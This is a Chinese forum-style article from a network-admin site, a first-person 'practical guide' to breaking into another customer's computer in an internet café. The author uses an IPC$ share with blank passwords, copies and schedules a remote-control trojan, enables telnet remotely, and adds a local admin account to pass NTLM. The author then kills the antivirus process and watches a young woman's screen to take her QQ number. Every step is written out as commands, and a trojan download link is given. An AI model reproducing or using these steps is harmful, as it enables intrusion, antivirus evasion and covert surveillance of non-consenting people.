网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > windows > 系统安全 > 网络安全 > 实战经验:网吧入侵全攻略  

实战经验:网吧入侵全攻略

2006-09-04  作者:BitsCN整理  来源:中国网管联盟  点评 投稿 收藏

   好久都没来网吧了,今天一朋友来找我。外面有下着雪,实在没地方玩,又给溜进了网吧……

网管论坛bbs_bitsCN_com

  在以前家里没买电脑时。整天都泡这网吧,所以对他的系统设置什么还了解点,都大半年没来了……不知道有啥变化…… 中国网管论坛bbs.bitsCN.com

  这网吧还不错.别的网吧都是无盘的或者就是98的.这里98和2000都有,呵.,搞入侵可方便了……

网管bitscn_com

  无意的看到13号坐着两MM,嘻.……入侵也由此开始了,看能不能拿到MM的QQ号……偶也找了一2000系统的机器做下,(偶找了一角落.呵.这样比较安全点..)

网管网www_bitscn_com

  打开偶可爱的CMD..先net name下看看本机情况 网管网www_bitscn_com

  WANGLU05

网管bitscn_com

  USER2000 网管u家u.bitscn@com

  命令成功完成。

中国网管论坛bbs.bitsCN.com

  我本机名是WANGLU05.ping下看看IP有无什么规则

网管网www_bitscn_com

  Pinging wanglu05 [192.168.0.13] with 32 bytes of data: 网管网www.bitscn.com

  Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

网管bitscn_com

  Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

网管bitscn_com

  Reply from 192.168.0.13: bytes=32 time<10ms TTL=64 中国网管论坛bbs.bitsCN.com

  Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

网管联盟bitsCN_com

  IP是改了.记的以前是有一种规则的.比如我5号把.内网IP就是192.168.0.5. 网管论坛bbs_bitsCN_com

  这次MM在13号..IP就不能猜了...不过网吧机器名可是一样的...有路了.

网管网www.bitscn.com

  Pinging WANGLU13 [192.168.0.225] with 32 bytes of data: 网管u家u.bitsCN.com

  Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

网管联盟bitsCN@com

  Reply from 192.168.0.225: bytes=32 time<10ms TTL=128 中国网管联盟bitsCN.com

  Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

网管bitscn_com

  得到内网IP是192.168.0.225...偶记的以前是存在默认共享的..这次换了网管不知道他有没做防范措施....从这入手....

网管联盟bitsCN_com

  net use file://192.168.0.225/ipc$ '' /user:'' 空连接成功..说明ipc$默认共享还在...

网管论坛bbs_bitsCN_com

  只是没权限...网吧的登陆用户全是一样的.而且密码为空.又让我给钻了空子.

网管联盟bitsCN_com

  G:/>net use file://192.168.0.225/ipc$ '' /user:'user04'

网管论坛bbs_bitsCN_com

  命令成功完成。 网管网www.bitscn.com

中国网管联盟bitsCN.com

如图1.

网管联盟bitsCN_com

  网吧系统盘为G盘.接着映射对方G盘为我本地Z盘. 网管网www_bitscn_com

  G:/>net use z: file://192.168.0.225/g$ 网管联盟bitsCN@com

  命令成功完成。 网管网www.bitscn.com

网管u家u.bitsCN.com

如图2 网管网www_bitscn_com

  现在我的电脑里多了一个Z盘...图3. 网管bitscn_com

网管网www.bitscn.com


  现在我们在这个Z盘里新建或删除文件.也就等于在192.168.0.225这个机器上操作了... 网管联盟bitsCN@com

  这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........表说我坏.... 中国网管联盟bitsCN.com

  下面来copy一个木马客户端上去先...由于只是看QQ而已...所以我找了一个 网管联盟bitsCN_com

  web控制台.体积没多大,205KB..下面是关于webserver的介绍./../

网管下载dl.bitscn.com

  web控制台 网管论坛bbs_bitsCN_com

  一个直接在IE栏里输入对方IP就可以控制对方机器的小软件,也就是所谓的B/S模式的控制。用起来很方便,对方运行了服务端后,你在IE栏里直接输入对方IP就可以控制了,也可以通过刷新来实现重复抓屏。

中国网管论坛bbs.bitsCN.com

  可以在我网络盘里下到 网管联盟bitsCN@com

  http://fhod.ys168.com

网管u家u.bitscn@com

  综合工具里有个 webserver.rar

网管网www.bitscn.com

  接着

中国网管论坛bbs.bitsCN.com

  G:/>copy webserver.exe file://192.168.0.225/admin$ 中国网管论坛bbs.bitsCN.com

  已复制 1 个文件。

网管下载dl.bitscn.com

  G:/>net time file://192.168.0.225 中国网管论坛bbs.bitsCN.com

  file://192.168.0.225 的当前时间是 2005/2/5 下午 05:00 中国网管联盟bitsCN.com

  命令成功完成。

网管u家u.bitsCN.com

  网管bitscn_com


图4

网管u家u.bitscn@com

  G:/>at file://192.168.0.225 17:02 webserver.exe

中国网管联盟bitsCN.com

  用AT命令启动webserver.exe. 网管网www.bitscn.com

  2分钟过后.在IE里输入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了...

网管bitscn_com

  FT....我说那.

网管下载dl.bitscn.com

  难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下.. 网管bitscn_com

  还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了... 网管下载dl.bitscn.com

  网管网www.bitscn.com

  开控制面板--管理工具--计算机管理

网管网www_bitscn_com

  操作-连接到另一计算机. 网管u家u.bitsCN.com

  然后输入IP192.168.0.225 网管联盟bitsCN@com

中国网管论坛bbs.bitsCN.com

图5 中国网管联盟bitsCN.com


  呵.等一会就可以看到成功了...你看到了什么?

网管u家u.bitscn@com

  更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务.

网管论坛bbs_bitsCN_com

网管网www.bitscn.com

图6 网管联盟bitsCN@com


  OK了... 中国网管论坛bbs.bitsCN.com

  本地打开一cmd 网管u家u.bitscn@com

  输入 中国网管论坛bbs.bitsCN.com

  G:/>telnet 192.168.0.225 网管下载dl.bitscn.com

  回车后出现

网管网www.bitscn.com

  Server allows NTLM authentication only 中国网管联盟bitsCN.com

  Server has closed connection 中国网管论坛bbs.bitsCN.com

网管联盟bitsCN@com

图7

网管联盟bitsCN@com


  需要NTML认证的...用小榕的那个ntml.exe就可以解决这一问题.

网管下载dl.bitscn.com

  ntlm.exe在《流光》的Tools目录中有的...

中国网管联盟bitsCN.com

  没工具怎么办呢.. 网管u家u.bitscn@com

  我们在本地添加一和远程主机同样的用户名 网管网www_bitscn_com

  输入

网管网www.bitscn.com

  net user user04 /add 添加user04密码为空的用户

网管联盟bitsCN@com

  net localgroup administrators user04 /add 把user04加入管理员组

中国网管联盟bitsCN.com

  然后来到G:/Winnt/system32下找到CMD.exe 网管网www.bitscn.com

  右击.创建快捷方式.然后在快捷方式 CMD右击..属性. 网管下载dl.bitscn.com

  在以其他用户身份运行前打勾... 网管网www.bitscn.com

网管下载dl.bitscn.com

图8 网管网www.bitscn.com

  然后运行然后运行快捷方式 CMD 网管网www_bitscn_com

  弹出窗口.在用户名处输入user04密码为空

网管论坛bbs_bitsCN_com

   网管联盟bitsCN@com


图9
网管联盟bitsCN_com

  然后

中国网管论坛bbs.bitsCN.com

  telnet 192.168.0.225

网管联盟bitsCN@com

  回车..哈哈...拿到shell了....

网管网www_bitscn_com

  接下来的事就好办了...去黑基down了一个knlps 命令行下杀进程的东东 网管联盟bitsCN@com

  copy上去././然后telnet上去.在CMD下执行...杀掉了瑞星的进程

网管bitscn_com

  这下把瑞星给关了.还怕他提示有毒 中国网管联盟bitsCN.com

  接着执行webserver.exe 网管网www_bitscn_com

  在IE里输入 网管网www.bitscn.com

  192.168.0.225

网管bitscn_com

网管联盟bitsCN_com

图10 网管u家u.bitscn@com


  看到了.挖卡卡..开心...点那个查看屏幕..呵..MM正在聊天... 网管论坛bbs_bitsCN_com

  好了她的QQ号码也拿到手了..加了她去聊聊去.... 网管bitscn_com


  网管联盟bitsCN_com

 

网管网www_bitscn_com



 

网管联盟bitsCN_com


TAGs   全攻略   入侵   网吧   经验   实战   ...   ..   bytes   然后   输入      
 上一篇:使网吧全部瘫痪的木马   下一篇:四个步骤加强网络防护
实战经验:网吧入侵全攻略 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: